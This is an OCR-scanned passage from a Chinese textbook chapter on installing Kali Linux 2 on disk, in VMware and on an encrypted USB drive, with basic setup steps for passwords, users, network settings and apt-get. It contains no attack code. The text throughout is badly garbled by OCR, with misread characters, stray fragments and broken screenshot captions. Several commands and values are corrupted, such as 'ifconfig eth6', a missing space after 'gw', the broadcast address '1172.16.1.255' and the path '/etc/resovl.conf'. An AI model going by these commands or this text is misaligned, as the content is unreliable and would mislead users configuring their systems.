如 果 您 选择 使 用 分 区 向 导 对 整个 磁盘 进行 分 区 ， 下 一 步 将 询问 您 要 使 用 哪个 磁盘 。 
分 区 方法 : 


向 导 - 使 用 整个 磁盘 

向 导 - 使 用 整个 磁盘 并 配置 LVM | 
向 导 - 使 用 整个 磁盘 并 配置 加 室 的 VM 
手动 




















| 屏幕 截图 | | 


图 2-12  JyKali Linux 2 设置 分 区 


步骤 10 ”选择 要 分 区 的 硬盘 ， 如 图 2-13 所 示 。 


磁盘 分 区 


注意 您 所 选择 的 磁盘 上 的 全 部 数据 都 将 会 被 删除 ， 但 是 您 还 有 确认 是 真 的 要 做 这 些 改动 的 机 会 。 
WEE: 





SCSIl (0,0,0) (sda) - 21.5 GB VMware, VMware Virtual S 











| WEE | 


图 2-13 ”磁盘 分 区 


ARA 接 下 来 要 根据 你 的 需求 进行 选 撞 ， 这 里 如 末 你 不 知道 如 何 
选择 的 话 ， 束 选择 第 一 个 方 条 ， 如 图 2-14 所 示 。 


磁盘 分 区 


已 选择 要 分 区 : 
SCSII (0,0,0) (sda) - VMware, VMware Virtual S: 21.5 GB 


对 此 磁盘 可 以 使 用 多 种 不 同 的 方案 进行 分 区 。 如 果 您 不 太 确 定 ， 请 选择 第 一 方案 。 
分 区 方案 : 








和 将 所 有 文件 放 在 同一 个 分 区 中 (推荐 新 手 使 用 ) 
将 /home 放 在 单独 的 分 区 
将 /home, /var 和 /tmp 都 分 别 放 在 单独 的 分 区 











图 2-14 将 所 有 文件 放 在 同一 个 分 区 中 





| HH 接 下 来 单 击 “ 继 续 ” 按 钮 后 ， 将 开始 安装 系统 ， 如 图 2-15 所 


磁盘 分 区 


如 果 您 继续 ， 以 下 所 列 出 的 修改 内 容 将 被 写 人 磁盘。 否则 您 将 可 以 进行 进一步 的 手动 修改 。 


以 下 设备 的 分 区 表 已 被 改变 : 
SCSIl (0,0,0) (sda) 


以 下 分 区 将 被 格式 化 : 


SCSIl (0,0,0) (sda) 设备 上 的 第 1 分 区 将 被 设置 为 ext4 
SCSIl (0,0,0) (sda) 设备 上 的 第 5 分 区 将 被 设置 为 swap 
T8042) 38 A BEER 0 ? 


Lond ] 


”屏幕 截图 


继续 


图 2-15 ”确定 要 格式 化 的 分 区 
步骤 13 接 下 来 ， 束 要 开始 系统 的 安装 过 程 了， 我 们 需要 耐心 等 生 
一 些 时 间 ， 如 图 2-16 所 示 。 


安装 系统 


ETRIE S HEIME... 


图 2-16 Kali Linux 2 的 安装 过 程 


步骤 14 配置 网 络 镜像 ，Kali Linux 2 使 用 中 心 源 来 发 布 软件 ， 这 里 
选择 “是 >”， 如 图 2-17 所 示 。 


配置 软件 包 管理 器 
网 络 镜像 可 以 用 来 补充 光盘 所 带 的 软件 ， 也 可 以 用 来 提供 较 新 版 本 的 软件 。 
EAE ERG ? 


geeseses 


forced 


图 2-17 Kali Linux 2 的 配置 软件 包 管 理 器 
步骤 15 下 一 步 要 安装 GRUB， 如 图 2-18 所 示 。 


和 将 GRUB 安装 至 硬盘 
看 起 来 新 安装 的 系统 将 是 这 台 计 算 机 上 唯一 的 操作 系统 。 如 果 的 确 如 此 ， 您 应 该 可 以 安全 地 将 GRUB 启动 引导 器 安装 到 第 一 硬盘 的 主 引 导 记 录 
(MBR) 上 。 


警告 : 如 果 安装 程序 无 法 在 您 的 计算 机 上 探测 到 已 存在 的 其 他 操作 系统 ， 修改 主 引导 记录 动作 暂时 将 使 该 操作 系统 无 法 启动 。 但 是 ， 您 可 以 稍 
后 再 手动 设置 GRUB 以 启动 它 。 
将 GRUB 启动 3| 导 器 安 准 到 主 引 导 记 录 (MBR) .Eng ? 


MÀ 


[wwe 


—MM 


图 2-18 将 GRUB 安 装 到 硬盘 


步骤 16 可 以 选择 GRUB 的 安装 位 置 ， 这 里 保留 默认 设置 即 可 ， 
图 2-19 所 示 。 


如 


94 GRUB 安装 至 硬盘 


您 需要 通过 将 GRUB 启动 引导 器 安装 到 可 启动 设备 上 以 使 新 安装 的 系统 能 够 启动 。 通 常 的 作法 是 将 GRUB. 安装 到 您 第 一 块 硬盘 的 主 引导 记录 
(MBR) 上 。 如 果 您 愿意 ， 也 可 以 将 GRUB 安装 到 驱动 器 的 其 他 地 方 ， 或 者 其 他 的 驱动 器 上 ， 甚 至 还 可 以 安装 到 一 张 软盘 上 。 
安 类 启动 引导 器 的 设 音 : 


手动 输入 设备 


/dev/sda 





 msmm | | xm |[ wm | 
E2-19 JH SN 


步骤 17 到 此 ， 系 统 已 经 安装 完毕 。 如 图 2-20 所 示 ， 单 击 “* 继 续 ” 投 
钮 重启 系统 后 就 可 以 进入 安装 过 好 的 Kali Linux 2 了 。 


结束 安装 进程 


installation complete 


Installation is complete, so it is time to boot into your new system. Make sure to remove 
installation media, so that you boot into the new system rather than restarting the ti 


NT M 





图 2-20 ”结束 安装 进程 


拔 掉 U 盘 重新 启动 计算 机 ， 操 作 系统 的 用 户 登录 界面 如 图 2-21 所 
这 里 可 以 使 用 用 户 名 “oot2? 和 步骤 8 中 议 置 的 黎 码 进行 


^u» 





图 2-21 Kali Linux 2 的 登录 界面 


2.20.2 ”在 VMware 虚拟 机 中 安装 KKali Linux 2 


在 现实 生活 中 ， 你 可 能 会 友 现 很 多 工作 必须 在 Windows 下 来 完成 ， 
所以 我 们 往往 需要 保留 Windows， 但 还 要 在 计算 机 上 安 闻 一 个 Kali Linux 
2 操作 系统 。 这 时 退 弟 有 两 个 选择 ， 一 是 安 疤 双 系统 ， 二 是 使 用 虚拟 
机 。 这 里 从 使 用 方便 的 角度 来 说， 我 更 建议 你 使 用 第 二 种 方法 。 因 为 虚 
拟 机 的 最 大 的 好 处 就 在 于 可 以 在 一 台 计 算 机 上 同时 运行 多 个 操作 系统 ， 
所 以 你 可 以 获得 的 其 实 不 只 是 双 系 统 ， 而 古 多 个 系统 了 。 这 些 操作 系统 
之 间 是 独立 运行 的 ， 跟 实际 上 的 多 合计 算 机 并 没有 区 列 。 但 是 企 拟 操作 
系统 的 时 候 会 造成 很 大 的 系统 开销 ， 因 此 最 好 加 大 计算 机 的 物理 内 存 。 


目前 最 为 优秀 的 虚拟 机 软件 包括 VMware workstation f Virtual 
Box， 这 两 个 软件 的 操作 都 很 答 单 ， 这 里 我 们 以 VMware workstation 为 
Ajo EEH VMware workstation 的 最 新 厂 本 为 12.5.7， 建 议 大 家 在 使 
用 的 时 候 尽 量 选择 了 最 新 的 版 本 。 


步骤 1 首先 我 们 可 以 在 VMware workstation 的 官方 网 站 
( https://www.vmware. com/products/workstation.html) F X zc FE. 
内 很 多 下 载 网 站 也 都 提供 了 VMware workstation 的 下 载 途 径 。 


步 又 2 开始 运 workstation 有 的 安装 程序 ， 这 个 安装 的 过 程 
很 简单 ， 这 里 不 于 逐步 介绍 ZH o 


步骤 3 完成 了 安装 工作 之 后 ， 接 下 来 束 可 以 局 动 VMware 
workstation 程 序 ， 局 动 以 后 的 界面 如 图 2-22 所 示 。 








r 
© VMware Workstation 














WORKSTATION 12 PRO 


+ - 


创建 新 的 虚拟 机 打开 虚拟 机 


























名 2-22 VMware workstation 的 局 动 界 面 


步骤 4 现在 ， 我 们 在 VMware ER 支 一 个 新 的 操作 系 
统 ， 首 先 要 在 菏 单 栏 上 选择 “文件 ?选项 卡 ， 然 后 在 弹出 的 下 拉 某 单 中 选 
择 “ 新 建 虚 拟 机 ”。 


步骤 5 这 时 会 弹出 一 个 “欢迎 使 用 新 建 虚拟 机 问 导 ”， 这 里 选择 “上 典 
型 " 即 可 ， 如 图 2-23 所 示 。 


欢迎 使 用 新 建 虚拟 机 向 导 


WORKSTATION: 您 希望 使 用 什么 类 型 的 配置 ? 


通过 几 个 简单 的 步 甸 创建 Workstation 12.x 
虚拟 机 。 


O BseEXSSRICC) 
AERA SCSI jpe meHim2tm 
以 及 与 旧版 VMware 产品 兼容 性 等 高 级 选项 
的 虚拟 机 。 








< 上 一 步 () [z-sm»]| mA .j 








图 2-23 TEEMAL 


步骤 6 接 下 来 ,我们 要 为 操作 系统 选择 一 个 安 沪 文件 。 你 可 以 使 
用 安 朗 光盘 ， 也 可 以 使 用 下 载 的 光盘 镜像 文件 〈iso 文 件 ) TRASTERO 
件 的 不 同类 型 ， 可 做 出 对 应 的 选择 ， 如 图 2-24 所 示 。 


安装 客户 机 操作 系统 
虚拟 机 如 同 物理 机 ， 需 要 操作 系统 。 您 将 如 何 安装 客户 机 操作 系统 ? 


安装 来 产 : 
安装 程序 光盘 (DJ): 


无 可 用 驱动 器 


o 安装 程序 光盘 映像 女 件 (is0 儿 M): 
D:uyRZS F Wkali-inux-2017.1-/386.iso 


dy GENNIO BERE RR o 
您 需要 指定 要 安装 的 操作 系统 。 


o 稍 后 安装 操作 系统 (3)。 
创建 的 虚拟 机 将 包含 一 个 空白 硬盘 。 








> 取消 





图 2-24 FENT ICA AR ANF 
步骤 7 在 这 里 根据 你 所 安装 系统 的 类 型 ， 选 择 对 应 的 操作 系统 ， 


例如 这 里 我 们 安装 的 是 Kali Linux， 这 个 版 本 是 基于 Debian 8.x 开 发 的 ， 
所 以 在 这 里 我 们 在 客户 机 操作 系统 中 选择 Linux， 然 后 在 版 本 里 选 
择 “Debian 8.x”， 如 图 2-25 所 示 。 


选择 客户 机 操作 系统 
此 虚拟 机 中 将 安装 哪 种 操作 系统 ? 





客户 机 操作 系统 


© Microsoft Windows(W) 
@ Linux(L) 
© Novell NetWare(E) 


© Solaris(S) 

© VMware ESX(X) 
O 其 他 (D) 
版 本 (V) 





图 2-25 ”选择 客户 机 操作 系统 
步骤 8 接 下 来 设置 虚拟 机 的 名 称 和 存放 的 位 置 ， 这 里 注意 最 好 选 


择 一 个 合适 的 名 称 ， 例 如 Kali-Linux2。 在 下 面 的 位 置 处 可 以 为 虚拟 的 操 
作 系 统 选择 一 个 存放 目录 ， 如 图 2-26 所 示 。 


您 要 为 此 虚拟 机 使 用 什么 名 称 ? 





虚拟 机 名 称 (): 
kali2-linux 
位 置 (L): 
D:\ 虚 拟 机 \Kali2-linux 
在 编辑 > 首选 项 中 可 更 改 默 认 位 置 。 








[< 上- 步 (B) | 


K2-26 ”为 虚拟 机 命名 


步骤 9 接 下 来 ， 我 们 给 这 个 虚拟 系统 分 配 物 理 便 盘 空间 ， 这 里 我 
们 使 用 默认 的 20GB 作 为 最 大 人 磁盘 大 小 ， 如 图 2-27 所 示 。 不 过 VMware 一 
开始 只 会 为 其 分 配 很 小 的 空间 ， 当 你 在 使 用 虚拟 机 的 时 候 ， 这 个 空间 会 
ri ai 在 本 书 所 有 的 实验 结束 之 时 ， 这 个 空间 可 能 要 扩大 到 60GB 


磁盘 大 小 为 多 少 ? 
虚拟 机 的 硬盘 作为 一 个 或 多 个 文件 存 铺 在 主机 的 物理 磁盘 中 。 这些 文件 最 初 很 
小 ， 随 着 您 向 虚拟 机 中 添加 应 用 程序 、 文 件 和 数据 而 这 渐变 大 。 


最 太 了 磁盘 太 小 ([GB)(S): 20.0 5 
针对 Debian 8.x 的 建议 大 小 : 20 GB 


S 将 虚 措 磁盘 存 铺 为 单个 文件 (QQ 
将 虚拟 磁盘 拆 分 成 多 个 文件 (M) 
ee 可 以 更 至 格 地 在 计算 机 之 间 移 动 虚拟 机 ， 但 可 能 会 降低 大 容量 磁盘 的 
性 能 。 











[eE-b) | EE NN 














图 2-27 指定 人 磁极 容量 


步骤 10 ”然后 单 击 “ 完 成 ”按钮 就 结束 了 虚拟 机 的 安装 过 程 ， 如 图 2- 
28 上 所 示 。 


已 准备 好 创建 虚拟 机 
单 击 完成 创建 虚拟 机 。 然后 可 以 安装 Debian 8.x。 


将 使 用 下 列 设 置 创建 虚拟 机 : 


kali2-linux 

D: Mibi Kali2-linux 
Workstation 12.x 
Debian 8.x 


20 GB 

512 MB 

NAT 

CD/DVD, USB 控制 器 , 声卡 


BisE GE CC)... 








图 2-28 创建 完成 


步骤 11 重 狐 局 动 虚拟 机 之 后 ， 会 出 现 如 图 2-29 所 示 的 Kali 安 装 局 
"PIU 接 下 来 的 安装 过 程 和 第 2.2.1 节 中 是 一 模 一 样 的 。 


KALI 


STe OUG 1 became, tie moie OU EI CNEA ITEENO 


Boot menu 


Live (B8B5-paeJ 
Live (B8b5-pae failsafe)J 


Live (forensic mode} 

Live USB Persistence (check kali.org^prst) 
Live USE Encrypted Persistence (check kali.org^prst) 
Install 

Graphical install 

Install uith speech synthesis 

Advanced options 





图 2-29 ÆVMware} z 4£Kali Linux 2 


除了 上 面 我 们 介绍 的 在 虚拟 机 中 安装 Kali Linux 2 之 外 ， 你 还 可 以 


Xt TE ELE P3 Offensive security 所 提供 的 虚拟 机 镜像 文件 。 下 载 地 址 为 
https://www.offensive-security. com/kali-Linux-vmware-virtualbox-image- 
download/。 本 书 中 所 使 用 的 实例 都 是 使 用 在 该 地 址 下 载 的 Kali Linux 32 
bit VM PAE 下 进行 调试 的 〈 见 图 2-30) ， 经 测试 这 也 是 最 为 稳定 的 一 个 
版 本 。 所 以 在 本 书 的 和 学习 过 程 中 ， 建 议 选 择 相 同 的 版 本 。 


ecd 


Linux Community page. These images have a default password of "toor" and may have pre-generated SSH host keys. 


Courses Certifications Online Labs Penetration Testing 


Kali Linux VMware Images Kali Linux VirtualBox Images Kali Linux Hyper-V Images 
Image Name Torrent Size | Version  SHA256Sum 
Kali Linux 64 bit VM Torrent 2.1G 2017.1 887244269771d4621c2c771271500039608738fcb71333a47b9ed9758a9efcb1 


Kali Linux 32 bit VM PAE Torrent 





Kali Linux Light 64 bit VM | Torrent | 0.5G | 2017.1 2ee5d38d8b9d099957930a1e589b3adec2d51bdleclcb0108d1dbc80308525bc 


Kali Linux Light 32 bit VM | Torrent | 0.5G | 2017.1 67e691c786f8a0c799300b79907cbedc85e8729e562671b3bced5610cca8b51d 


图 2-30 Kali Linux 32 bit VM PAE 的 下 载 地 址 


下 载 乙 后 是 一 个 压缩 文件 ， 将 这 个 文件 解压 到 指定 目录 中 。 例 如 我 
将 这 个 文件 解压 到 了 E: Kali-Linux-2017.1-vm-i686 目 录 。 那 么 启动 
VMware 之 后 ， 在 玉 单 选项 中 依次 选中 “文件 ”%“% 打 开 ”， 如 图 2-31 所 示 。 


| XB Sess (E) EE) EET ERED 





| E 新 建 虚拟 机 (N) 。 Ctrl N 
打开 (O)... Ctl-O 上 
| LATE E HH EL [ tri - VV | 


Ctrl - L 





C^» xeREEI VMware vCloud Arr(V)... 
|l mERLHEASEREL)... 
导出 为 QVF(E).. 
[由 ”映射 席 拟 磁 鼻 [M).. 

















图 2-31 在 菜单 选项 中 依次 选中 “文件 2 打开? 


然后 在 弹出 的 文件 选择 框 中 选中 “Kali-Linux-2017.1-vm-i686.vmx”， 
如 图 2-32 所 示 。 


OnT = m a a Å- - 


GE js| |; « Kali-Linux-2017.1.. » Kali-Linux-2017.1-vm-i686 » 


E 
名 称 


d Kali-Linux-2017.1-vm-i686.vmx.lck 
1] Kali-Linux-2017.1-vm-i686.vmx 








d| Kali-Linux-2017.1-vm-i686 
Jk Kali-Linux-2017.1-vm-i686 
d| Kali-Linux-2017.1-vm-i686 
d netica 


上 出 rE 





文件 名 (N): Kali-Linux-2017.1-vm-1686.vmx v | 所 有 支持 的 文件 -| 


mmo ][ ww ] 














图 2-32 ”选中 “Kali-Linux-2017.1-vm-i686.vmx” 


双击 打开 之 后 ， 在 VMware 的 左 侧 列表 中 ， 束 多 了 一 个 Kali-Linux- 
2017.1-vm-i686 系 统 ， 双 击 这 个 选项 就 可 以 局 动 这 个 系统 了 。 


2.2.3 ”在 加 密 U 可 中 安装 Kali Linux 2 


上 面 介 绍 的 安放 方法 和 Windows 操 作 系 统 没有 太 大 区 别 。 你 可 以 鬼 
照 这 种 方法 将 Kali Linux 2 安 儿 到 目 己 的 台 却 机 或 者 笔记 本 上 。 可 是 在 现 
实生 活 中 ， 即 使 是 笔记 本 计算 机 ， 我 们 也 不 可 能 总 是 随 吴 携 市 。 不 过 ， 
现实 世界 中 计算 机 是 随处 可 见 的 ， 只 是 这 些 设备 大 都 不 可 能 安 骤 Kalj 这 
种 专业 操作 系统 。 如 果 我 们 可 以 将 Kali Linux 安 装 到 U 盘 ， 然 后 在 任何 计 
算 机 执行 运行 U 杭 中 有 的 系统 束 好 了 (注意 这 里 要 和 前 一 市 的 用 U 税 作为 
安 逆 盘 不 同 ， 这 里 指 的 是 将 U 盘 插入 主机 后 直接 可 以 使 用 ) 。 


如 末 你 看 过 日 本 著名 的 墨客 题材 电视 剧 《 血 色 星 期 一 》， 其 中 出 现 
过 这 样 一 个 人 情节， 由 三 浦 春 马 饰 猴 的 画 主 人 公 将 目 己 的 U 盘 插入 到 便 利 
店 的 计算 机 中 ， 然 后 局 动 了 目 己 的 操作 系统 。 电 影 中 的 这 球 U 盘 在 当年 
引起 了 很 多 人 的 关注 ， 几 乎 成 了 传说 的 神 卓 。 


现在 ， 我 们 来 介绍 一 下 这 款 神 器 的 制作 方法 ， 首 先 需 要 一 个 U 檀 ， 
最 好 不 要 小 于 32GB， 通 常 来 说 64GB 的 U 盘 更 合适 ， 因 为 后 期 我 们 在 进 
行 软件 安 靖 和 更 新 的 时 候 ， 系 统 会 很 快 地 变 大 。 


将 Kali Linux 2 安装 到 U 盘 上 的 方法 有 很 多 种 ， 下 面 介绍 使 用 虚拟 机 
进行 安装 的 方法 ， 这 个 安装 过 程 和 之 前 介绍 大 部 分 是 一 样 的 ， 但 是 需要 
注意 以 下 几 点 。 

第 一 ， 在 上 一 节 介绍 的 出 现 系统 启动 界面 之 前 将 U 盘 插入 到 计算 机 


中 ， 并 在 出 现 局 动 界 面 的 时 候 右 键 单 击 虚拟 机 右 下 角 的 移动 设备 挂 载 控 
钮 ， 如 图 2-33 所 示 。 


在 弹出 的 下 拉 菜 单 中 选中 “连接 〈 断 开 与 主机 的 连接 ) ”选项 ， 如 图 
2-34 上 所 示 。 





Feet ER (H) 


图 2-34 Kali Linux 2 的 启动 界面 


在 新 弹出 的 对 话 框 中 单 击 “ 确 定 ”， 这 时 真实 计算 机 束 看 个 到 这 个 设 
备 了 ， 这 个 设备 被 加 载 到 了 虚拟 机 中 。 


第 二 ， 在 选择 磁盘 分 区 时 ， 要 选择 “ 回 寻 -使 用 整个 磁 登 并 配置 
加 密 的 LVM”， 如 图 2-35 所 示 ， 这 样 就 可 以 为 U 盘 湛 加 一 个 密码 。 


磁盘 分 区 


安装 程序 能 够 指导 您 采用 各 种 标准 方案 进行 磁盘 分 区 。 如 果 您 喜欢 ， 您 也 可 以 手动 操作 。 如 果 选 择 了 分 区 向 导 ， 稍 后 您 还 是 有 机 会 检查 和 修改 
分 区 设置 结果 。 


如 果 您 选择 使 用 分 区 向 导 对 整个 磁盘 进行 分 区 ,下 一 步 将 询问 您 要 使 用 哪个 磁盘 。 
分 区 方法 : 


向 导 - 使 用 整个 磁盘 





向 导 - 使 用 整个 磁盘 并 配置 LVM 
向 导 - 使 用 整个 磁盘 并 配置 加 密 的 VM 














区 | 





[ xm j| wx Ji 





图 2-35 Kali Linux 2 的 磁盘 分 区 向 导 


第 三 ， 在 倒 盘 分 区 选择 安装 目录 的 时 候 ， 要 选择 U 盘 而 不 是 硬盘 ， 
如 图 2-36 所 示 。 


磁盘 分 区 


注意 您 所 选择 的 磷 盘 上 的 全 部 数据 都 将 会 被 制 除 ， 但 是 您 还 有 确认 是 真 的 要 做 这 些 改动 的 机 会 。 
EREDAR : 























SCSII1 (0,0,0) (sda) - 21.5 GB VMware, VMware Virtual S 
| SCS14 (0,0,0) (sdb) - 4.0 GB SMI USB DISK | 
REMM | | am | 





图 2-36 ”选择 U 盘 


等 安装 完成 之 后 ， 一 个 装 有 Kali Linux 28]UZR LAUR, | . TEX, HB 
然 这 个 U 盘 系统 在 大 多 数 的 主机 设备 上 都 可 以 正常 运行 ， 但 是 也 存在 少 
量 设 备 不 兼容 的 问题 。 


2.3 KaliLinux2 的 常用 操作 


RIIAS Y Kali Linux 2 之 后 ， 可 以 看 到 一 个 和 Windows 相 类 似 的 图 
形 化 操作 界面 ， 这 个 界面 的 上 方 有 一 个 采 早 柱 ， 左 侧 有 一 个 快捷 的 工具 
栏 。 单 击 漆 单 上 的 “应 用 程序 ”"， 可 以 打开 一 个 下 拉 亲 单 ， 所 有 的 工具 按 
照 功 能 的 不 同 分 成 了 13 种 (来 蛙 中 是 有 14 个 选项 ， 但 是 最 后 的 “系统 服 
务 ” 并 不 是 工具 分 类 ) 。 妆 我 们 选中 其 中 一 个 种 类 的 时 候 ， 这 个 种 类 所 
包含 的 软件 就 会 以 末 蛙 的 形式 展示 出 来 ， 如 图 2-37 所 示 。 


但 是 这 里 展示 的 只 是 其 中 的 一 部 分 工具 ， 而 不 是 全 部 。 如 末 你 希望 
能 看 到 所 有 应 用 程序 的 话 ， 可 以 单 击 元 侧 的 快捷 工具 栏 最 下 方 的 显示 全 
部 程序 按钮 ， 如 图 2-38 所 示 。 


应 用 程序 ~ ”位置 ~ 星期 三 15:16 


收藏 — Firefox ES 

01 - 信息 收集 TS 

02 - "pL 

03 - Web 程 序 EM 文件 

04 - 数据 库 评估 软件 

5 - 密码 攻击 

06 - 无 线 攻 击 
DAIR burpsuite 
- 漏洞 利用 工具 和 集 “| beef xss fr... 


09 - 嗅 探 /欺骗 D 
faraday IDE \ | 


M metasploit... 


armitage 


0 - 权限 维持 
1- 数字 取证 — Leafpad 


12 - 报告 工具 集 8B tra 


3 - Social Engineering Tools 
- 系统 服务 


常用 程序 





图 2-37 Kali Linux 2 中 的 菜单 





图 2-38 ”显示 全 部 程序 按 饰 
这 时 在 屏 戎 上 才 会 亚 示 出 全 部 的 应 用 程序 ， 如 图 2-39 所 示 。 


应 用 程序 ~ 


dconf .… Ettercap Firefo.. 


[9] Gscrip.. 





图 2-39 ”显示 出 来 的 全 部 程序 


Noe i ia EE HAR, aJ LE H A m 
J 命令 来 打开 工 上 其 。 


2.3.1 ”修改 默认 的 用 户 


如 果 你 使 用 的 是 从 官网 下 载 的 Kali Linux 2 虚拟 机 镜像 文件 的 话 ， 那 
么 其 中 献 认 的 窒 人 码 是 “toor”。 如 果 你 想 修 改 这 个 冠 码 的 话 ， 可 以 使 用 命 
令 “passwd2?+ 用 户 名 的 方式 ， 例 如 我 们 需要 修改 root 用 户 答 码 的 话 ， 吏 可 
以 使 用 “passwd root*”， 过 程 如 图 2-40 所 示 。 





root@kali: ~ o © Q0 


文件 (F) ”编辑 (E) ”查看 (V) ”搜索 (S) ”终端 (T) 帮助 (H) 
:~# passwd root 

输入 新 的 UNIX 密码 : 

重新 输入 新 的 UNIX 密码 : 


passwd : 已 成 功 更 新 密码 
:~# 





图 2-40 ”修改 root 用 户 密 码 
当 你 再 次 登录 的 时 候 ， 束 需要 使 用 新 的 密 介 了 。 


虽然 很 多 程序 都 要 求 必须 只 有 root 权 限 的 用 户 才能 运行 。 但 是 在 很 
多 情况 下 ， 更 高 的 权限 也 意味 看 更 大 的 风险 。 我 们 如 果 以 root 用 户 的 号 
份 操作 失误 的 话 ， 可 能 会 对 正在 测试 的 系统 造成 破坏 。 所 以 在 很 多 时 低 
以 非 root 用 户 的 号 份 来 进行 测试 是 一 个 更 好 的 选择 。 


现在 我 们 来 创建 一 个 权限 较 低 的 账户 ， 创 建 用 户 的 命令 为 adduser， 
现在 我 们 来 打开 一 个 终端 ， 然 后 在 里 面 输入 命令 “adduser I, TAJA 
果 如 图 2-41 所 示 。 





root@kali: ~ 
编辑 (E) ”查看 (V) ”搜索 (5S) ”终端 (T) 帮助 (H) 





图 2-41 XI —4 HP 
xx Hd ADSUSEBJHIP ra ANR, nE2-4A2BT7. 


输入 新 的 UNIX 密码 : 


J UNIX 密码 : 


房间 号 码 []: 2017 
王 作 上 电 证 [DB 
家 庭 电 话 8888888 
RE []: 8 
les BLU 





E2-42 ”为 这 个 新 用 户 设置 一 个 密码 


到 此 一 个 新 的 普通 用 户 融 创建 好 了 ， 需 要 注意 这 个 用 户 不 具 答 root 
XBR- 


2.3.2 XjKali Linux 2 的 网 络 进行 配置 


TAL] IR E 22488 H] Kali Linux 2 功能 的 话 ， 束 必须 对 它 的 网 络 进 行 正 
傅 的 配置 。 首 先 来 查看 一 下 当前 主机 的 网 络 配置 情况 ， 有 基体 的 操作 是 首 
HHA — T $&9m, WB 2-43 所 示 。 


Applications v Places v Wed 04:06 
i 


Favorites [3] Firefox ESR 


- Information Gathering i 
~ Terminal 
- Vulnerability Analysis 


- Web Application Analysis Files 


- Database Assessment | 
metasploit .… 


- Password Attacks 


3 armitage 
- Wireless Attacks g 


- Reverse Engineering k burpsuite 
图 2-43 1]JT— T £m 


然后 在 打开 的 终端 中 输入 命令 “ifconfig”， 这 条 命令 可 以 用 来 查看 网 
络 的 设置 情况 ， 显 示 的 内 容 如 图 2-44 所 示 。 





root(Qkali: ~ oo Q 


File Edit View Search Terminal Help 
:~# ifconfig 
eth0: flags-4163«UP,BROADCAST,RUNNING,MULTICAST» mtu 1500 
inet 192.168.169.130 netmask 255.255.255.0 broadcast 192.168.169.255 
inet6 fe80::20c:29ff:fel2:dd23 prefixlen 64 scopeid 0x20<link> 
ether 00:0c:29:12:dd:23 txqueuelen 1000 (Ethernet) 
RX packets 27338 bytes 27238427 (25.9 MiB) 
RX errors © dropped © overruns © frame 0 
TX packets 18772 bytes 1817541 (1.7 MiB) 
TX errors © dropped 0 overruns 0 carrier © collisions 0 
device interrupt 19 base 0x2024 


lo: flags-73«UP,LOOPBACK,RUNNING» mtu 65536 


inet 127.0.0.1 netmask 255.0.0.0 

inet6 ::1 prefixlen 128 scopeid 0x10<host> 

loop txqueuelen 1 (Local Loopback) 

RX packets 38613 bytes 13407498 (12.7 MiB) 

RX errors © dropped © overruns © frame 0 

TX packets 38613 bytes 13407498 (12.7 MiB) 

TX errors © dropped 0 overruns 0 carrier 0 collisions 0 


:-4 | 





图 2-44 ”使 用 ifconfig 查 看 网 络 


这 里 面 因为 我 们 使 用 的 是 VMware 虚拟 机 ，VMware 已 经 自动 地 为 
Kali Linux 2 设置 了 HP 地址 、 子 网 掩 码 和 了 网关 。 但 是 如 果 我 们 使 用 的 Kali 
2 系统 并 不 是 安装 在 虚拟 机 中 的 话 ， 束 需要 手动 来 设置 这 些 网 络 参 
HT. 


比如 你 需要 为 这 个 系统 设置 如 下 : 


主机 IP 地 址 : 172.16.1.100 
TAI: 255.255.255.0 
BRUAJ: 172.16.1.254 

DNS 服务 器 : 211.81.200.9 


那么 你 就 可 以 在 命令 行 中 执行 如 下 命令 : 


root@kali:~# ifconfig eth6 172.16.1.100 netmask 255.255.255.0 


root@kali:~# route add default gw172.16.1.254 
root@kali:~# echo nameserver 211.81.200.9 > /etc/resolv.conf 





但 是 仅仅 这 样 设 置 是 不 够 的 ， 如 条 系统 重 司 之 后 ， 卫 地 址 和 路 由 的 
所 有 的 设置 束 会 丢失 不 过 DNS 的 设置 仍然 还 在 )。 如 果 硕 户 这 个 设置 
能 够 一 直 起 作用 的 话 ， 就 需要 将 这 些 设置 写 到 文件 中 去 ， 这 个 文件 的 日 
录 位 于 /etc/networlwvinterfaces 文 件 中 ， 打 开 之 后 如 图 2-45 所 示 。 








| yf interfaces | E = oooD0 


letc/network 








# This file describes the network interfaces available on your system 
# and how to activate them. For more information, see interfaces(5). 


source /etc/network/interfaces.d/* 
# The loopback network interface 


auto lo 
iface lo inet loopback 


图 2-45  /etc/network/interfaces X. fF 
在 打开 的 文件 下 方 添加 如 下 语句 : 


auto ethO 
iface ethO inet static 
address172.16.1.100 


netmask 255.255.255.0 
network172.16.1.0 
broadcast172.16.1.255 
gateway172.16.1.254 


e 修改 完 的 完整 文件 如 图 2-46 所 示 。 





| Opn > || 1 Save =| 000 
# This file describes the network interfaces available on your system 
# and how to activate them. For more information, see interfaces(5). 


*interfaces 


letc/network 








source /etc/network/interfaces.d/* 


# The loopback network interface 
auto lo 

iface lo inet loopback 

auto eth0 

iface ethO inet static 

address 172.16.1.100 

netmask 255.255.255.0 

network 172.16.1.0 

broadcast 1172.16.1.255 

gateway 172.16.1.254| 


K-46 ”修改 之 后 的 /etc/network/interfaces 文 件 
Kali Linux 2 的 DNS 服 务 嚣 地址 不 在 这 个 文件 中 ， 我 们 可 以 使 用 前 面 


的 echo 命 令 来 修改 。 也 可 以 打开 DNS 配置 文件 来 修改 。 我 们 需要 打开 另 
一 个 “/etc/resovl.conf” 文 件 进 行 配 置 ， 这 个 文件 中 使 用 “nameserver” 来 指 
定 DNS 服 务 器 地 址 ， 最 多 可 以 指定 3 个 DNS， 只 有 当前 面 的 DNS 服务 器 
无 效 的 时 候 ， 后 面 的 DNS 才 会 起 作用 。 在 resolv.conf 中 指定 DNS 服务 喜 
的 格式 如 下 : 


domain 
nameserver 10.10.10.10 
nameserver 102.54.16.2 


完成 上 面 的 设置 之 后 ， 执 行 如 下 命令 : 
这 样 ， 狐 的 网 络 设置 束 可 以 成 功 了 。 


人 


2.3.3 在 Kali Linux 2 安装 第 三 方程 序 


虽然 在 Kali Linux 2 中 已 经 预 荫 了 超过 300 种 的 应 用 程序 ， 但 是 有 时 
TAL VITIA e i de e EE ER OR VA UE ri BET VR XR TAM ft Kali 
Linux 2 中 安装 第 三 方 的 应 用 是 比较 简单 的 。 


这 里 我 们 同样 可 以 使 用 apt-get 命 令 来 实现 对 软件 进行 管理 ， 这 条 命 
令 主 要 用 于 从 互联 网 的 软件 仓库 中 搜索 、 安 骤 、 升 级 、 芭 载 软件 或 操作 
系统 。 我 们 可 以 使 用 命令 apt-get install 命 令 在 kali Linux 2 中 安装 软件 。 
比如 说 我 们 现在 要 安装 apt-file 这 个 软件 ，apt-file 是 一 个 命令 行 界面 的 
